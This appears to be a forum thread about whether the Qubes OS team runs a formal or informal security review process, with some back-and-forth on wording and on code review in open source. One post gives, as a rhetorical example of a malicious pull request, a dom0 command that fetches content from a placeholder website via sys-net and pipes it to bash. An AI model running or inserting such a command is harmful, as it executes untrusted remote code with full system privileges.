So, I was wondering: Does the Qubes team use a formal or informal procedure for security reviews?
To make that more concrete, if there's a documented procedure and documented results, I’d consider it a formal procedure.
The reason I’m asking is that if a formal procedure is used, maybe the procedure and results of individual security reviews could be opened up so people could follow along as a learning experience.
Thanks to @barto for finding the post about doing community security reviews as a practice/learning experience that I had in mind when I wrote this. The original post is:
I asked “formal or informal” and you said “NO”, which does not make sense. So… I’m guessing your no is actually referring to your lack of enthusiasm for the idea of a community review process as talked about in that thread?
The answer is to the question in the thread title, “Does the Qubes team use a formal or informal security review process?”, and it makes sense: “does the Qubes team […]?” NO.
It’s all semantics, because you assume things. If I ask “do you beat your wife & kids in the morning or in the evening?” you’d want to answer NO too.
To be fair, you are the security reviewer when it comes to anything GPL, and it can get quite costly to organise a full review, especially if it involved third parties…
Yeah, it’s a bit like that thing, I forgot what it’s called, when something is being robbed and everyone is just standing and watching because they all think someone else will surely call the police. It seems a popular mindset in open source too: “it’s popular, so there are surely lots of people verifying all the source code”. We must also remember that these are extremely advanced skills we are talking about.
Well, the comments on GitHub imply to me that they do review stuff.
You are saying that you believe that if you submit a Qubes GitHub pull request for something that includes something like a dom0: qvm-run --pass-io sys-net "wget http://mywebsite.com; cat index.html" | bash
that it will get accepted without review?
For those who have never written any computer code before, none of this is beyond your comprehension.
If you’ve ever managed people at work before, you know how frustrating it is when everyone is making their work conform to a particular style, and it all fits in nicely together, and then you have this one employee who has spent all this time making something that doesn’t fit into the big picture…
Sure, maybe the employee was able to get the desired result, but the methodology and internal workings to get to that desired result had no similarity to anything else that already exists in the project. More importantly, maybe what that employee has done requires a lot of ongoing maintenance to keep working.
It’s less work for everyone if people who want to contribute make code that “fits” in with the bigger picture, because then they don’t have to waste time undoing everything they’ve done.
You can’t really write code “in a bubble” (well, you can, but it usually takes a lot more time and effort than just referencing something you or someone else has already written).